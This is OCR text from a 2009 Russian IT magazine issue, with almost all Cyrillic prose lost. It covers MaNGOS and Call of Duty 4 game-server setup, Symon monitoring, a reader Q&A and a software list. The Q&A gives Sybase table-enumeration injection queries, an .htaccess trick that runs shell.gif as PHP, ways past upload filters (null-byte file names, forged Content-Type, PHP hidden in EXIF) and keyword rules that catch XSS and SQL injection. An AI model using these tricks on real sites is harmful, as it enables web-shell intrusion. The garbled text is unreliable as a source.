sf.net/projects/sdbmangos), MaNGOS-DBs (sf.net/projects/gmdb), EDB .
. ,
, ,
(100% ,
, ).
. UDB ( ), YTDB . - .
SVN- UDB:
$ svn co https://unifieddb.svn.sourceforge.net/svnroot
$ cd unifieddb

131

>> SYN/ACK
mysql> UPDATE 'realmlist' SET 'name' = My superpuper WoW
server' , 'address' = '192.168.1.158' WHERE 'id' = '1';
Query OK, 1 row affected (0.01 sec)

, , . :
mysql> SELECT * FROM 'account' WHERE 1 LIMIT 1000;

account
realmd. (, admin/password):
mysql> DELETE FROM account;
mysql> INSERT INTO 'account' ('username','sha_pass_
hash','gmlevel') VALUES ('admin',SHA1(CONCAT(UPPER('a
dmin'),':',UP PER('password'))),'3');
mysql> quit;

FWv3
MaNGOS

,
MySQL, phpMyAdmin.

RAR. Ubuntu , :


:
mangosd.conf, realmd.conf scriptdev2.conf. /usr/local/
etc ( --sysconfdir). scriptdev2.conf
,
.

$ sudo apt-get install unrar

:
$ unrar e trunk/Full_DB/UDB_0.10.4_Core_6766_SD2_689.rar
$ mysql -u mangos -p mangos < UDB_0.10.4_Core_6766_SD2_689.sql

.
Updates 7 , , , .
cat trunk/Updates/0.10.4_additions/* > updates.sql.
,
, . , updates
mangos, realmd, realmlist, characters.
, . , 5632_characters.
sql 5632 characters.
, , , . :
$ svn info ~/mangos/ | grep 'Revision:'
Revision: 205

: MaNGOS/0.13.0
(2008-12-30 02:00:26 Revision 6985 205).
6766 ( UDB_0.10.4_Core_6766_SD2_689.
sql). , 30.12.2008 205/6985. . ,
, .
ScriptDev2. :
$ mysql -u mangos -p mangos < src/bindings/ScriptDev2/
sql/mangos_full_scripts.sql
$ unrar e tags/EAI/EAI_0.0.4_323.rar
$ mysql -u mangos -p scriptdev2 < EAI_0.0.4_323.sql

, , : realmlist
( IP-):
$ mysql -umangos -pmangos
mysql> use realmd;
Database changed

132

$ sudo nano /usr/local/etc/realmd.conf


# MySQL hostname;port;username;password;database
# ,

LoginDatabaseInfo = "127.0.0.1;3306;mangos;mangos;realmd"
# , PID-
LogFile = "Realmd.log"
LogsDir = "/var/log"
PidFile = "/var/run/realmd.pid"
# ,
RealmServerPort = 3724
BindIP = "0.0.0.0"

mangosd.conf :
$ sudo nano /usr/local/etc/mangosd.conf
LoginDatabaseInfo = "127.0.0.1;3306;mangos;mangos;realmd"
WorldDatabaseInfo = "127.0.0.1;3306;mangos;mangos;mangos"
CharacterDatabaseInfo = "127.0.0.1;3306;mangos;mangos;ch
aracters"
MaxPingTime = 30
WorldServerPort = 8085
BindIP = "0.0.0.0"

mangos/contrib/extractor AD, ( Linux Windows).


(AD.exe), .
(, mangos.ru) dbc- /usr/local/share/mangos/dbc:
$ cd /usr/local/share/mangos
$ mkdir dbc; cd dbc
$ sudo unrar e ~/dbc.rar

WOW AD.exe,
maps . maps /usr/local/share/mangos.
X 03 /123/ 09

>> SYN/ACK

links

Game Scanner

Quice
vmaps, WoW
vmap_extract_assembler_bin ( MaNGOS)
makevmaps_SIMPLE.
bat. vmaps,
, maps.
:
$ sudo /usr/local/bin/mangos-realmd
$ sudo /usr/local/bin/mangos-worldd

, . ,
, ( ). ,
, nice -n -20. ,
,
Sourceforge . , MaNGOS
DB Terminal (sf.net/projects/mdbt), - MWFv3
(mangos-wf-v3.sf.net). ,
, , Quice (quice.indomit.
ru). WotLK (MaNGOS Beta
Server, sf.net/projects/wotlkmangosbeta), MaNGOS .

ALL OF DUTY 4
Call of Duty 4 :
, , , -
. , icculus.org/news/
news.php?id=4095, Download cod-4.ru www.callofduty.ru/forum ( Linux).
Windows Linux,
Full .
, Full .
,
DVD- . :

cod4-linux-server-11212007.tar.bz2
$ tar xjvf cod4-linux-server-11212007.tar.bz2

(cod4_lnxded, cod4_
lnxded-bin, libgcc_s.so.1, libstdc++.so.6),
chmod +x .
Setup/Data
cod4.
6.5 .
main , .iwd,
video, Mods ( mods), zone
localization.txt. ,
zone. ! - PunkBuster:
$ ./pbsetup.run -e
$ ./pbsetup.run --add-game=cod4 --add-gamepath=/where/i/uploaded/cod4/
$ ./pbsetup.run -u

, pbsetup.run ,
www.punkbuster.com.
:

, MaNGOS:
getmangos.com
ytdb.kanet.ru
forum.1wow.ru
mangos.ru
mangos.org.ru
,
COD:
www.callofduty.ru
cod-4.ru
legion-rus.clan.su

info

SourceForge.net

MaNGOS COD.
Counter Strike
Linux
#051.

$ sudo ./cod4_lnxded

,
+set loc_language 6.
IP-, , (, Punkbuster ,
;
, ):
$ sudo ./cod4_lnxded +set dedicated 1 +set
net_ip 192.168.1.158 +set net_port 28960 +exec
server.cfg +map_rotate +set sv_punkbuster 1
+set loc_language 6

+set dedicated 1
, +map_rotate .
main. netstat/sockstat :

$ mkdir cod4; cd cod4


$ sockstat | grep cod4

, icculus.org. (
3 ) :
$

wget

X 03 /123/ 09

-c

http://0day.icculus.org/cod/

root cod4_lnxde 63855 24 udp4 192.168.1.158:28960 *:*

,
(20500, 29900, 20510 28960).
. z

133

>> SYN/ACK
SERGEY JAREMCHUK

ANDREY MATVEEV

SYMON:

, .

. ,
, , . Symon , ,
.
SYMON
Symon (www.xs4all.nl/~wpd/symon)
OpenBSD, FreeBSD,
NetBSD Linux. BSD- , , .
CPU, , , ,
PF . , Symon
- . ,
. :
symon ,
. ,
(CPU, ),
.
chroot.
symux symon RRD-.

134

symux , , , .
:
syweb PHP-, RRDtool .
sylcd , LCD- (
CrystalFontz HD44780).
SymuxClient.pm Perl, getsymonitem.pl.
. ,
phpSymon (www.ryanflannery.net/works/phpsymon), syweb, .
FreeBSD. ,
, , .
:
X 03 /123/ 09

>> SYN/ACK

tcpdump?
Syweb
# cd /usr/ports/sysutils/symon
# make install clean

Symon, ,
RRDTool. :
# pkg_info | grep symon
symon-2.79_1 Performance
tool

and

information

monitoring

! .

SYMON
symon symux symon.conf symux.conf. /etc/:
# cp -v /usr/local/share/examples/symon/*.conf /etc/

. symon /etc/symon.conf. :
monitor "{" resources "}" [every] "stream" ["from" host]
["to"] host [ port ]

, , 2100
( UDP):
monitor {cpu(0), mem, if(lo0), io(wd0)} stream to 127.0.0.1 2100

, ,
. . symon(8). :
cpu/cpuiow (idle, user, nice, system,
interrupt), iowait cpuiow. 100,
2.
df .
if ( / , , , ).
io .
mem .
pf/pfq PF ( , ) ALTQ.
sensor , , . .
proc .
, OpenBSD, iptables ipfw,
pf. , X 03 /123/ 09

: fatal: pf module not available.


, proc
. proc ps, ifconfig. fdisk dmesg.
, sysctl hw.sensors.
,
c_config.sh. ,
(
, io , CPU ):
# /usr/local/share/symon/c_config.sh > /etc/symon.conf

.
, , ,
, MySQL Clamd, :
# vi /etc/symon.conf
monitor{cpu(0),mem,mbuf,pf,df(sd0a),df(sd0d),df(sd0e),
sensor(lm0.temp0), sensor(lm0.temp1), sensor(lm0.fan0),
proc(squid), proc(httpd), proc(spamd), proc(mysqld),
proc(clamd),
if(fxp0), if(fxp1), if(fxp2), if(tun0),
io(wd0), io(wd1)
} stream to 127.0.0.1 2100

,
localhost IP- ( DNS-), : stream to 192.168.10.10 2100 (
). , 5 . ,
, time
. :
# /usr/local/libexec/symon -t
/etc/symon.conf: ok

, . symon , , .
,
'-d' 'u':
# /usr/local/libexec/symon -d -u
symon version 2.79
program id=9530
debug: symon packet size=362
sending packets to udp 127.0.0.1 2100

135

>> SYN/ACK

Symux -d
Syweb
started module io(wd0)

. ,
:
# /usr/local/libexec/symon

,
tcpdump i lo0
2100 , /var/run/
symon.pid symon ps au.
symon :
# vi /etc/rc.local
if [ -x /usr/local/libexec/symon ]; then
echo 'starting symon'; /usr/local/libexec/symon
fi

# symon

, :
# /usr/local/libexec/symux -t
warning: /etc/symux.conf:7: file '/var/www/symon/rrds/
localhost/df_sd0e.rrd', guessedannot be opened
warning: /etc/symux.conf: no filename specified for stream
'df(sd0e)'

, , , . , :
# mkdir -p /var/www/symon/rrds/localhost

, !

SYMUX
Symux. symux.conf
, , /, .
:

symux RRD-. c_smrrds.sh,


symon. :
c_smrrds.sh [oneday] [interval <seconds>] [all] <rrd files>

:
# vi /etc/symux.conf
# symon
# mux 192.168.10.10 2100
mux 127.0.0.1 2100
#
source 127.0.0.1 {
accept {
# , (
symon.conf)
cpu(0), mem, mbuf, pf, df(sd0a), df(sd0d), df(sd0e),
sensor(lm0.temp0), sensor(lm0.temp1), sensor(lm0.fan0),
proc(squid), proc(httpd), proc(spamd), proc(mysqld),
proc(clamd),
if(fxp0), if(fxp1), if(fxp2), if(tun0),
io(wd0), io(wd1)
}
# ,
datadir "/var/www/symon/rrds/localhost"
#
# write sensor(lm0.fan1) in "/var/www/symon/rrds/
localhost/sensor_lm0.fan0.rrd"
}

136

# cd /usr/local/share/symon/
# ./c_smrrds.sh all

. :
# /usr/local/libexec/symux -t
/etc/symux.conf: ok

, symux :
# vi /etc/rc.local
if [ -x /usr/local/libexec/symux ]; then
echo 'starting symux'; /usr/local/libexec/symux
fi

, symon, .
, -l ,
.
, -d.
# /usr/local/libexec/symux -d
X 03 /123/ 09

>> SYN/ACK

links

Symon www.xs4all.
nl/~wpd/symon.

- ,
( Free/OpenBSD
www):


phpSymon www.
ryanflannery.net/
works/phpsymon.

# chown -R www:www /var/www/syweb/


# chown -R www:www /var/www/symon/

phpSymon

debug:
rrdupdate

/var/www/symon/rrds/
localhost/df_sd0e.rrd
1233494631:15630616:8801288:8801288:0:0:0:0

. - .


, .
( SymuxClient.pm getsymonitem.pl)
/usr/local/share/symon/client.
;
:
./getsymonitem.pl <symux host> <symux port>
<measured host> <stream> <item>
# cd /usr/local/share/symon/client
# ./getsymonitem.pl 127.0.0.1 2100 127.0.0.1
'cpu(0)' user
12.80

man 8 symux. CPU : user, nice,


system, interrupt, idle.
, PHP, syweb phpSymon.
Apache + PHP,
, . syweb:
# wget -c http://www.xs4all.nl/~wpd/symon/
philes/syweb-0.58.tar.gz
# tar zxf syweb-0.58.tar.gz

htdocs symon
DocumentRoot -:
# cd syweb
# cp -rv htdocs/syweb /var/www
# cp -rv symon /var/www
X 03 /123/ 09

syweb/setup.inc .
Free/OpenBSD ( chroot ):
# vi /var/www/syweb/setup.inc
$symon['rrdtool_path']='/usr/local/bin/
rrdtool';
$symon['cache_dir']='/var/www/symon/cache';
$symon['host_tree']='/var/www/symon/rrds';
$symon['layout_dir']='/var/www/symon';

,
:

video


,
,
symon
.

# mkdir /var/www/symon/cache
# chown www:www /var/www/symon/cache

- chroot, , install_rrdtool.sh,
rrd chroot-.
, http://localhost/syweb
. , .
PF.
,
.htaccess:
# vi /var/www/syweb/.htaccess
AuthName "Syweb zone"
AuthType Basic
AuthUserFile
/usr/local/etc/apache/httpd_
access
require valid-user

htpasswd,
Apache:
# htpasswd -c
access admin

/usr/local/etc/apache/httpd_

, Symon ,
. z

info
proc
ps,

ifconfig,

fdisk dmesg.


,


sysctl hw.sensors.

RRDTool

(z_11_2008).

137

>> units
CORWIN

STEP

/ CORWIN88@MAIL.RU /

FAQ UNITED:

Q: Sybase , INFORMATION.SCHEMA.Tables(columns)?
A: Sybase sysobjects.
.
( ,
,
) select name from bd..
sysobjects where type=U. bd ,
. U ,
,
. ,
hex- U 0x55. (...)
where type=0x55.
Q: ?
A: : select dbname
from master..syslogins.
select dbname from master..syslogins
where dbname not in (_hex__ __).
,
, hex.
: select dbname from master..syslogins
where dbname not in (db1___hex,db2_
__hex,...). :

138

select dbname from master..syslogins where


dbname not in (0x646231,0x64626e616d6532,...).
Q:
MD5-.
?
A: , , . http://hashchecker.com.
: (50 )
$15, (100 ) $25.
Rainbow ( , 196 16 DVD
$500).
Q: .

?
A:
John The Ripper Distributed John
(http://freshmeat.net/projects/djohn).
Q: WEP
Windows Mobile?
A: WMobile monitor
mode, WiFi-
.

Q: .htaccess -
( IP-
)?
A: Ronald van den Heetkamp
:
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING}
(|%22).*(>|%3E|<|%3C).* [NC]
RewriteRule ^(.*)$ log.php [NC]
RewriteCond %{QUERY_STRING}
(<|%3C).*script.*(>|%3E) [NC]
RewriteRule ^(.*)$ log.php [NC]
RewriteCond %{QUERY_STRING}
(javascript:).*(;).* [NC]
RewriteRule ^(.*)$ log.php [NC]
RewriteCond %{QUERY_STRING}
(;|'|"|%22).*
(union|select|insert|drop|
update|md5|benchmark|or|and|
if).*[NC]
RewriteRule ^(.*)$ log.php [NC]
RewriteRule (,|;|<|>|'|`)
/log.php [NC]
X 03 /123/ 09

>> units

Q: PHP
-,
( ).
?
A: ,
PHP :). ,

. ,

HTTP.
. .
Q: SSH?
A:
ip-,

. BlockSSHD (http://
blocksshd.sourceforge.net). , .
(/etc/blocksshd/blocksshd.conf)
:
max_attempts => '4'
// ;
unblock => '1'
// , ip ;
send_email => '1'
// email (0 );
email => 'mymail@mail.com'
// email;
email_whois_lookup => '0'
//
whois email;
:
-d | --daemon | --start
//
--stop
-h | --help
-v | --version
Q: ,
. ,

php, perl cgi.
-?
A: , . -, , gif, .htaccess :
<Files shell.gif>
AddType application/
x-httpd-php .gif
</Files>
, .
X 03 /123/ 09

Q: , ,
- , ?
A:
.
(
).
,
cgi
(
,
, ). Content-Type.
:
<?php
if($_FILES['userfile']
['type']!="image/gif"){
echo 'Error!';
exit;
}

, Content-Type:
text/plain, MIME-
.
Content-Type:
image/gif.
move_uploaded_file
copy. -, ,
null- (%00, \x00). ,
, , :
<?php
//
if ($allowed)
{
//
move_uploaded_file
($_FILES[userfile]
[tmp_name], $uploadfile);
echo Uploaded!;
}
else {
echo Error!;
}
?>
php-,
, null- (shell.php%00.jpg),
.
, -
getimagesize. getimagesize()
GIF, JPG,
PNG, SWF, PSD, TIFF BMP , /.
, :

<?php
$imageinfo=
getimagesize($)FILES['userfile']
['tmp_name']);
if
($imageinfo['mime']
!='image/gif'
&& imageinfo['mime']
!= 'image/ jpeg') {
echo 'Error!';
exit;
}
//
?>
, EXIF-
(,

, ACDSee ..)
-, php,
Content-Type
.
,
.
Q:
?
A: ,
base64
. ,
XOR- .
, ,
, .
. Suhosin (http://hardenedphp.net/suhosin),
:
sql-injection
cookie

eval()
preg_replace /e
phpinfo()


null-byte
HTTP
Response Splitting
?
suhosin!
,
; ,
..

139

>> units

Q: XSS
cookies. ?
A: , , ,


.
Q: CMS, -, . . ?
A: Register_
globals. -
, .
,
,
,
.
. ,
:). ,

, advisory (

).
Q:
. ,
:
. , 3G-,
Samsung WiMax
Yota.
, , ,
.
Ubuntu?
A: , ,
, madwimax
(http://code.google.com/p/madwimax). ,
-
Linux- Samsung SWC-U200 USB Mobile Wimax.
user-space,
,
libusb-1.0.
:
Linux, .
?
:
1. :
sudo path/to/wimax
.
State: NORMAL, :

140

. 3.
2. :
sudo ifconfig tap0 up

3. :
sudo dhclient tap0
.
, .

habrahabr.ru/blogs/WiMAX/50504.
Q:
,
Linux?
A: ! ,
Windows XP:
1.
USB, , VirtualBox (www.
virtualbox.org).
2.
.
3.
:
sudo tunctl -t tap0 -u zero
sudo ifconfig tap0 192.168.0.1 up
sudo chmod 0666 /dev/net/tun

4. VirtualBox , host interface tap0.


5. .
6. XP
IP: ,
192.168.0.1.
7.
proxy-. SmallProxy
(smallproxy.ru).
8. USB- ,
, .
9.
Yota.
10.

192.168.0.1:3128.
Q: RSS-
( Google Reader)
. ,
,
friends only.
?
A: .
,
,
RSS-.
Yahoo Pipes

(pipes.yahoo.com),
. ,
?
,
RSS Proxy (http://rss-proxy.darkk.
net.ru).
RSS-,
,
. ,
, : http://github.
com/darkk/rss-proxy.
Q: SMS- XMPP
(Jabber)?
A:
,
XMPP. , ,
. :

,
Python Clickatell Bulk SMS
Gateway (www.clickatell.com),
IP. MessagingBay (http://
www.messagingbay.com),
. ( , ) .
, , .
? :
1. Mail.ru.
2. jabber- mail.ru jabber.ru.
3. jabbera ,

SMS.
: 50
:).
Q: , ][
RIA-.

,
?
A: . Adobe
Labs
Distributable Player (http://labs.adobe.com/
technologies/distributableplayer), ,
, RIA-
.
:
Flash Lite 3.1 Distributable Player.
.
Adobe Mobile Packager. , SWF - Windows Mobile
Symbian S60.

! z
X 03 /123/ 09


2100 . ( 15%
)

. ,

!
!

+ + DVD:

- 155 ( 25% , )
12

3720

2100

+DVD 6
1200 .

1. ,
, www.
glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .

:

;
20
.
,
.
, . ,
, .

, , 8(495)780-88-29 ( )
8(800)200-3-999 ( , , ).
info@glc.ru www.GLC.ru

>Multimedia
aTunes 1.12.0 Solano
GIMP for Windows 2.6.5
ICY Radio 0.5
MorphVOX Junior 2.7.2
MorphVOX Pro - Voice Changer 4.2.8
Open Subtitle Editor 0.1.2
Picasa 3
Songbird 1.0

>Misc
BatteryBar v3.1 Beta
Executor 0.98.56
Eyes Relax 0.44
Fast Duplicate File Finder 1.1.0.0
FruitfulTime ProductivityMeter
HoeKey 1.13
KGB Archiver 2
KSoft's SmartUp Menu 0.1.1
Mac Finder Toolbar for Windows
0.3.2
Plates 1.10
RBTray 3.3
SpellChecker 2.1.0.115
Synergy 1.3.1
The Guide 2.0
timeEdition 1.1.4
TNR CodeExpert
TNR MoonLight -
1.3.46
Visual Task Tips 3.4

>Development
Carbide ++ 2.0
Groovy 1.6
HTTP Debugger Pro 3.2
IntelliJ IDEA 8.1
MySQL GUI Tools 5.0-r17
Perl Dev Kit (PDK) 8.0.0.289618
RJ TextEd 4.81
S60 Platform SDK
VB Decompiler 7.1

>>WINDOWS
>Dailysoft
7-Zip 4.65
Autoruns 9.37
DAEMON Tools Lite 4.30.3
Download Master 5.5.9.1157
FarPowerPack 1.15
FileZilla Client 3.2.2.1
IrfanView 4.23
JDataSaver
K-Lite Mega Codec Pack 4.7.0
Miranda IM 0.7.17
Mozilla Firefox 3.0.6
Notepad++ 5.2
Opera 9.64
PuTTY 0.60
QIP Infium RC4, Build 9026
Skype 4.0
Total Commander 7.04a
Unlocker 1.8.7
Winamp 5.55
Xakep CD DataSaver 5.2

>>UNIX
Desktop
Day Planner 0.9.2
Kino 1.3.3
PeaZip 2.5
Bash 4.0
Keryx 0.92
GIMP 2.6.5
PinkyTagger 2.2
MC 4.6.2
Compiz 0.8.0
OpenOffice 3.0.1
man-pages 3.19
Mkvtoolnix 2.5.1
GWhere 0.2.3
AcetoneISO 2.0.3

>System
Easy AutoInstaller 2.1
Gizmo Central 2.7.3
HD Tune Pro 3.50
InstallPad 0.4
Nero BackItUp 4
Secunia Personal Software Inspector
1.0.0.3
SyncBackPro 5.3.0.18
Vombato Mail Drive 1.3

>Security
Attack Testing Platform
BtProx 1.3.4
CryptoTunnel 2.0
DShield Web honeypot Alpha
FlowMatrix
HookExplorer
IBM Rational AppScan Standard
Edition V7.8
KeePass 1.15
Malcode Analysys Pack
MultiPlot
PTSecurity Microsoft Patches
Network Scanner
Rising Internet Security 2009
21.22.30
SSA 1.2
Sunbelt Network Security Inspector
1.6.52
SysAnalyzer
Xspider 7.7.3100

>Net
BitKinex 3.0.9
Digsby Build 49
Dropbox 0.6.402
GhostWall FireWall 1.150
MyConnection PC 3.0b
PC Tools Firewall Plus 5
Safari 4beta
toonel.net 0.0.50.50
WinGate 6.5.2
Zimbra Desktop 1.0

Sweet Home 3D 1.6


VirtualDub 1.9.0
ZS4 Video Editor 0.958

>Security
AIM Sniff 1.0b
Aircrack-ng 1.0 rc2
Arpalert 2.0.11
Chkrootkit 0.48
Ettercap 0.7.3
GreenSQL 0.9.4
John the Ripper 1.7.3.1
Kismet 2008.05-R1
Nmbscan 1.2.5

>Net
aria2 1.2.0
Arora 0.5
Darkstat 3.0.711
FileZilla 3.2.2
Firefox 3.0.6
KTorrent 3.2
Liferea 1.4.26
Miro 2.0
Opera 9.63
Quassel 0.4.0
qutIM 0.1.99
Skype 2.0.072
streamtuner2 1.9.8
Transmission 1.51
Tucan 0.3.4

>Games
Pingus 0.7.2
World of Goo 1.4.0

>Devel
Automake 1.10.2
Bespin
Biew 5.7.3.1
Boost 1.38.0
Eric 4.3.0
Fingerprint Verification System 0.1.0
GCC 4.3.3
Glade 3.4.0
Google Web Toolkit 1.5.3
Groovy 1.6
GTK+ 2.14.7
haXe 2.02
IntellijIDEA 8.1
Libjpeg 6b
Moonlight 1.0
Navicat 8.0.28
Qt 4.4.3
Ruby 1.9.1
zlib 1.2.3

Picasa 3.0 beta


:
Amora 1.1
Cibyl 2.0
Gammu+ 0.40
gnokii 0.6.27
j2megl 0.0.7
Moccatroller 1.8
obexfs 0.11
SieFS 0.5
SMSTerm 0.6.1
Wammu 0.29

>X-distr
Debian 5.0 Lenny

>System
Bootchart 0.9
FreeRemote 0.1.3
Likewise Open 5.1.0
Linux Kernel 2.6.28.7
NVClock 0.8
nVidia Linux Display Driver x86
180.35
Parted Magic 3.7
RPM 4.6.0
Shake 0.99
SmbSync 1.0
System Rescue CD 1.1.5
VirtualBox 2.1.4
Wine 1.1.16

>Server
Bind 9.6.0
Cups 1.4
DBMail 2.3.5
Dhcp 4.1.0
DSPAM 3.8.0
FreeRemoted 0.14
Jabberd 2.2.7.1
NSD 3.2.1
OpenLDAP 2.4.15
OpenSSH 5.2
Postfix 2.5.6
Sarg 2.2.5
Sendmail 8.14.3
Snort 2.8.3.2
SQUID 3.0 STABLE13
Yaass Project 0.8.9
Ziproxy 2.6.9

OpenStego 0.5.1
p0f 2.0.8
Pam_usb 0.4.2
sqlmap 0.6.4
Sshguard 1.4rc2
THC-Amap 5.2
THC-Hydra 5.4
THC-pptp-bruter 0.1.4

03(123) 2009

http://

WWW2
2


TORRENT-

OPENTRACKERS
WWW.OPENTRACKERS.FR


-. , ( ). , ,
.
opentrackers.
RSS.

WAKOOPA
WAKOOPA.COM

, ,
, Warcraft
III, .
. :). , ,
, ,
.

144


IT-

IT MANAGER 3
ITMANAGER3.INTEL.COM

, , .
IT Manager Intel IT-. , IT- ,

.

SKYFEX
SKYFEX.COM


. , - ActiveX
Internet Explorer, :
, . , SkyFex
.
SOS, . , .
X 03 /123/ 09